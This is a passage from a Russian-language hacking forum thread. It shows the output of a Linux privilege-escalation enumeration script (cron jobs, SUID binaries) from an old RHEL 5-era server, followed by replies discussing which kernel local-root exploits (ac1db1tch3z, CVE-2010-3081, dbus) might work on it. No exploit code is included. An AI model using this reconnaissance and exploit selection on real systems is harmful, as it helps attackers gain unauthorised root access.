lrwxrwxrwx  1 root root   25 2013-03-14 15:11:44.000000000 +0400 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac
lrwxrwxrwx  1 root root   26 2011-03-21 17:17:31.000000000 +0300 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
lrwxrwxrwx  1 root root   26 2011-03-21 17:17:31.000000000 +0300 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
lrwxrwxrwx  1 root root   26 2011-03-21 17:17:31.000000000 +0300 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
lrwxrwxrwx  1 root root   26 2012-03-15 04:22:56.000000000 +0400 libdevmapper-event.so -> libdevmapper-event.so.1.02
lrwxrwxrwx  1 root root   28 2013-01-29 13:35:19.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx  1 root root   31 2013-01-29 13:36:04.000000000 +0400 libdevmapper-event-lvm2.so -> libdevmapper-event-lvm2.so.2.02
lrwxrwxrwx  1 root root   34 2011-09-18 00:35:43.000000000 +0400 libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc13
lrwxrwxrwx  1 root root   46 2013-01-29 13:36:04.000000000 +0400 libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so
lrwxrwxrwx  1 root root   48 2013-01-29 13:36:04.000000000 +0400 libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so
total 15M
**************************************************
*             crontab info                       *
*                                                *
**************************************************
[+]List of CRON tabs:
4408691    4 -rwxr-xr-x   1 root     root          354 Aug 11  2010 /etc/cron.daily/tmpwatch
4408319    4 -rwxr-xr-x   1 root     root          180 Jun  4  2012 /etc/cron.daily/logrotate
4407379    4 -rwxr-xr-x   1 root     root          418 May 30  2012 /etc/cron.daily/makewhatis.cron
4408041    4 -rwxr-xr-x   1 root     root          137 Sep  3  2009 /etc/cron.daily/mlocate.cron
32325734    4 -rwxr-xr-x   1 root     root          296 Feb 25 14:06 /etc/cron.daily/rpm
4408045    4 -rwxr-xr-x   1 root     root          282 Jun  2  2008 /etc/cron.daily/yum.check-update
32325735    4 -rwxr-xr-x   1 root     root          150 Mar 20 16:12 /etc/cron.daily/freshclam
4408042    4 -rwxr-xr-x   1 root     root         2181 Jun 21  2006 /etc/cron.daily/prelink
4407924    0 -rw-r--r--   1 root     root            0 May 16  2008 /etc/cron.deny
4408018    4 -rwxr-xr-x   1 root     root          414 May 30  2012 /etc/cron.weekly/makewhatis.cron
32391237    4 -rwxr-xr-x   1 root     root         2843 Jan  9  2013 /etc/cron.weekly/99-raid-check
4407925    4 -rw-r--r--   1 root     root          500 Jan 11  2011 /etc/crontab

[+]List of USER CRON tabs:
=====================================
== READ cronfile: /etc/cron.daily/tmpwatch
flags=-umc
/usr/sbin/tmpwatch "$flags" -x /tmp/.X11-unix -x /tmp/.XIM-unix \
	-x /tmp/.font-unix -x /tmp/.ICE-unix -x /tmp/.Test-unix \
	-X '/tmp/hsperfdata_*' 240 /tmp
/usr/sbin/tmpwatch "$flags" 720 /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
    if [ -d "$d" ]; then
	/usr/sbin/tmpwatch "$flags" -f 720 "$d"
    fi
done
== end of /etc/cron.daily/tmpwatch 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/logrotate
#!/bin/sh

/usr/sbin/logrotate /etc/logrotate.conf
EXITVALUE=$?
if [ $EXITVALUE != 0 ]; then
    /usr/bin/logger -t logrotate "ALERT exited abnormally with [$EXITVALUE]"
fi
exit 0
== end of /etc/cron.daily/logrotate 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/makewhatis.cron
#!/bin/bash

LOCKFILE=/var/lock/makewhatis.lock

# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes.  The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "{ rm -f $LOCKFILE ; exit 255; }" EXIT
touch $LOCKFILE
makewhatis -u -w
exit 0
== end of /etc/cron.daily/makewhatis.cron 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/mlocate.cron
#!/bin/sh
nodevs=$(< /proc/filesystems awk '$1 == "nodev" { print $2 }')
renice +19 -p $$ >/dev/null 2>&1
/usr/bin/updatedb -f "$nodevs"
== end of /etc/cron.daily/mlocate.cron 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/rpm
#!/bin/sh

tmpfile=`/bin/mktemp /var/log/rpmpkgs.XXXXXXXXX` || exit 1
/bin/rpm -qa --qf '%{name}-%{version}-%{release}.%{arch}.rpm\n' 2>&1 \
	| /bin/sort > "$tmpfile"

if [ ! -s "$tmpfile" ]; then
	rm -f "$tmpfile"
	exit 1
fi

/bin/mv "$tmpfile" /var/log/rpmpkgs
/bin/chmod 0644 /var/log/rpmpkgs
== end of /etc/cron.daily/rpm 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/yum.check-update
#!/bin/bash

Mail="root"

List=`mktemp /tmp/yum.check-update.XXXXXXXXXX`

# Clean up when done or when aborting.
trap "rm -f $List" 0 1 2 3 15

yum -R 10 -e 0 -d 0 check-update >$List 2>&1

if [ $? -ne 0 ]; then
        mail -s "yum updates available: `hostname`" $Mail < $List
fi

== end of /etc/cron.daily/yum.check-update 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/freshclam
#!/bin/sh

### A simple update script for the clamav virus database.
### This could as well be replaced by a SysV script.

/usr/bin/freshclam --quiet
== end of /etc/cron.daily/freshclam 
=====================================
=====================================
== READ cronfile: /etc/cron.daily/prelink
#!/bin/sh

. /etc/sysconfig/prelink

renice +19 -p $$ >/dev/null 2>&1

if [ "$PRELINKING" != yes ]; then
  if [ -f /etc/prelink.cache ]; then
    echo /usr/sbin/prelink -uav > /var/log/prelink/prelink.log
    /usr/sbin/prelink -uav >> /var/log/prelink/prelink.log 2>&1 \
      || echo Prelink failed with return value $? >> /var/log/prelink/prelink.log
    rm -f /etc/prelink.cache
    # Restart init if needed
    [ -n "$(find `ldd /sbin/init | awk 'NF == 4 { print $3 }'` /sbin/init -ctime -1 2>/dev/null )" ] && /sbin/telinit u
  fi
  exit 0
fi

if [ ! -f /etc/prelink.cache -o -f /var/lib/misc/prelink.force ] \
   || grep -q '^prelink-ELF0.[0-2]' /etc/prelink.cache; then
  # If cache does not exist or is from older prelink versions or
  # if we were asked to explicitely, force full prelinking
  rm -f /etc/prelink.cache /var/lib/misc/prelink.force
  PRELINK_OPTS="$PRELINK_OPTS -f"
  date > /var/lib/misc/prelink.full
  cp -a /var/lib/misc/prelink.{full,quick}
elif [ -n "$PRELINK_FULL_TIME_INTERVAL" \
       -a "`find /var/lib/misc/prelink.full -mtime -${PRELINK_FULL_TIME_INTERVAL} 2>/dev/null`" \
	  = /var/lib/misc/prelink.full ]; then
  # If no more than PRELINK_NONRPM_CHECK_INTERVAL days elapsed from last prelink
  # (be it full or quick) and no packages have been upgraded via rpm since then,
  # don't do anything.
  [ "`find /var/lib/misc/prelink.quick -mtime -${PRELINK_NONRPM_CHECK_INTERVAL:-7} 2>/dev/null`" \
    -a -f /var/lib/rpm/Packages \
    -a /var/lib/rpm/Packages -ot /var/lib/misc/prelink.quick ] && exit 0
  date > /var/lib/misc/prelink.quick
  # If prelink without -q has been run in the last
  # PRELINK_FULL_TIME_INTERVAL days, just use quick mode
  PRELINK_OPTS="$PRELINK_OPTS -q"
else
  date > /var/lib/misc/prelink.full
  cp -a /var/lib/misc/prelink.{full,quick}
fi

echo /usr/sbin/prelink -av $PRELINK_OPTS > /var/log/prelink/prelink.log
/usr/sbin/prelink -av $PRELINK_OPTS >> /var/log/prelink/prelink.log 2>&1 \
  || echo Prelink failed with return value $? >> /var/log/prelink/prelink.log
# Restart init if needed
[ -n "$(find `ldd /sbin/init | awk 'NF == 4 { print $3 }'` /sbin/init -ctime -1 2>/dev/null )" ] && /sbin/telinit u

exit 0
== end of /etc/cron.daily/prelink 
=====================================
=====================================
== /etc/cron.deny EMPTY
=====================================
=====================================
== READ cronfile: /etc/cron.weekly/makewhatis.cron
#!/bin/bash

LOCKFILE=/var/lock/makewhatis.lock

# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes.  The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "{ rm -f $LOCKFILE; exit 255; }" EXIT
touch $LOCKFILE
makewhatis -w
exit 0
== end of /etc/cron.weekly/makewhatis.cron 
=====================================
=====================================
== READ cronfile: /etc/cron.weekly/99-raid-check
#!/bin/bash
#
# This script reads it's configuration from /etc/sysconfig/raid-check
# Please use that file to enable/disable this script or to set the
# type of check you wish performed.

# We might be on a kernel with no raid support at all, exit if so
[ -f /proc/mdstat ] || exit 0

# and exit if we haven't been set up properly
[ -f /etc/sysconfig/raid-check ] || exit 0
. /etc/sysconfig/raid-check

[ "$ENABLED" != "yes" ] && exit 0

case "$CHECK" in
    check) ;;
    repair) ;;
    *) exit 0;;
esac

active_list=`grep "^md.*: active" /proc/mdstat | cut -f 1 -d ' '`
[ -z "$active_list" ] && exit 0

dev_list=""
check_list=""
devnum=0
for dev in $active_list; do
    echo $SKIP_DEVS | grep -w $dev >/dev/null 2>&1 && continue
    if [ -f /sys/block/$dev/md/sync_action ]; then
	# Only perform the checks on idle, healthy arrays, but delay
	# actually writing the check field until the next loop so we
	# don't switch currently idle arrays to active, which happens
	# when two or more arrays are on the same physical disk
	array_state=`cat /sys/block/$dev/md/array_state`
	sync_action=`cat /sys/block/$dev/md/sync_action`
	if [ "$array_state" = clean -o "$array_state" = active ] && [ "$sync_action" = idle ]; then
	    ck=""
	    echo $REPAIR_DEVS | grep -w $dev >/dev/null 2>&1 && ck="repair"
	    echo $CHECK_DEVS | grep -w $dev >/dev/null 2>&1 && ck="check"
	    [ -z "$ck" ] && ck=$CHECK
	    dev_list="$dev_list $dev"
	    check[$devnum]=$ck
	    let devnum++
	    [ "$ck" = "check" ] && check_list="$check_list $dev"
	fi
    fi
done
[ -z "$dev_list" ] && exit 0

devnum=0
for dev in $dev_list; do
    echo "${check[$devnum]}" > /sys/block/$dev/md/sync_action
    let devnum++
done
[ -z "$check_list" ] && exit 0

checking=1
while [ $checking -ne 0 ]
do
	sleep 60
	checking=0
	for dev in $check_list; do
	sync_action=`cat /sys/block/$dev/md/sync_action`
		if [ "$sync_action" != "idle" ]; then
			checking=1
		fi
	done
done
for dev in $check_list; do
	mismatch_cnt=`cat /sys/block/$dev/md/mismatch_cnt`
	# Due to the fact that raid1 writes in the kernel are unbuffered,
	# a raid1 array can have non-0 mismatch counts even when the
	# array is healthy.  These non-0 counts will only exist in
	# transient data areas where they don't pose a problem.  However,
	# since we can't tell the difference between a non-0 count that
	# is just in transient data or a non-0 count that signifies a
	# real problem, simply don't check the mismatch_cnt on raid1
	# devices as it's providing far too many false positives.  But by
	# leaving the raid1 device in the check list and performing the
	# check, we still catch and correct any bad sectors there might
	# be in the device.
	raid_lvl=`cat /sys/block/$dev/md/level`
	if [ "$mismatch_cnt" -ne 0 -a "$raid_lvl" != "raid1" ]; then
		echo "WARNING: mismatch_cnt is not 0 on /dev/$dev"
	fi
done

== end of /etc/cron.weekly/99-raid-check 
=====================================
=====================================
== READ cronfile: /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly


##-- Spamooborona cron entries start
#10 5 * * *	root	/etc/spamooborona/scripts/cron_spamstat
#*/20 * * * *	root	/etc/spamooborona/scripts/cron_rul
#20 10 * * *	root	/etc/spamooborona/scripts/cron_notify



##-- Spamooborona cron entries end

== end of /etc/crontab 
=====================================
**************************************************
*             FIND suid files                    *
*                                                *
**************************************************
-rws--x--x 1 vcsa root 7.7K Nov 11  2007 /usr/libexec/mc/cons.saver
-rwsr-xr-x 1 root root 174K Feb 22  2012 /usr/libexec/openssh/ssh-keysign
-rws--x--x 1 root root 18K Nov  8  2012 /usr/bin/chfn
---s--x--x 2 root root 174K Mar  8 20:06 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 25K Jan  9  2013 /usr/bin/newgrp
-rwsr-xr-x 1 root root 23K Aug 11  2010 /usr/bin/passwd
---s--x--x 2 root root 174K Mar  8 20:06 /usr/bin/sudo
-rws--x--x 1 root root 19K Nov  8  2012 /usr/bin/chsh
-rwsr-xr-x 1 root root 43K Jan 27  2010 /usr/bin/at
-rwsr-xr-x 1 root root 50K Jan  9  2013 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 47K Jan  9  2013 /usr/bin/chage
-rwsr-sr-x 1 root root 303K Feb 23  2012 /usr/bin/crontab
-rwsr-sr-x 1 root zabbix 29K Jul 30  2007 /usr/sbin/fping
-r-s--x--- 1 root apache 12K Jun 26 18:38 /usr/sbin/suexec
-rwsr-xr-x 1 root root 30K Jul 30  2007 /usr/sbin/fping6
-rws--x--x 1 root root 33K Feb 27  2009 /usr/sbin/userhelper
-rwsr-xr-x 1 root root 6.8K Aug  9  2012 /usr/sbin/usernetctl
-rwsr-x--- 1 root dbus 45K Aug 11  2011 /lib/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 59K Nov  8  2012 /bin/mount
-rwsr-xr-x 1 root root 35K Sep 26  2009 /bin/ping
-rwsr-xr-x 1 root root 24K Mar 21  2012 /bin/su
-rwsr-xr-x 1 root root 40K Nov  8  2012 /bin/umount
-rwsr-xr-x 1 root root 31K Sep 26  2009 /bin/ping6
-rwsr-xr-x 1 root root 72K Jan  9  2013 /sbin/mount.nfs4
-rwsr-xr-x 1 root root 19K Jan  9  2013 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 72K Jan  9  2013 /sbin/umount.nfs4
-rwsr-xr-x 1 root root 72K Jan  9  2013 /sbin/umount.nfs
-rwsr-xr-x 1 root root 13K Jan  9  2013 /sbin/pam_timestamp_check
-rwsr-xr-x 1 root root 72K Jan  9  2013 /sbin/mount.nfs
[!] ALL JOBS DONE, Have a good day!
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 04.08.2013, 03:10   #918
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 353
Репутация: 105
По умолчанию

На заборе тоже [censored] написано, а там доски. Выложи хотя бы видео, может узнаем сплойт. Я давно слышал про сплойт под -194.el5 но до сих пор в паблике тишина.
b3 вне форума   Ответить с цитированием
Старый 05.08.2013, 17:16   #919
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

емнип ac1db1tch3z работает до 2.6.18-194.15.2
194.32 не пробивается
12309 вне форума   Ответить с цитированием
Старый 05.08.2013, 17:22   #920
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

ac1db1tch3z вроде работает только 2.6.27+, не?

и потом там

CVE-2010-3081 - Published: 2010-09-16

явно под 2011 не пойдет

dbus можно посмотреть, но нужен пароль юзера (любого)
Pashkela вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot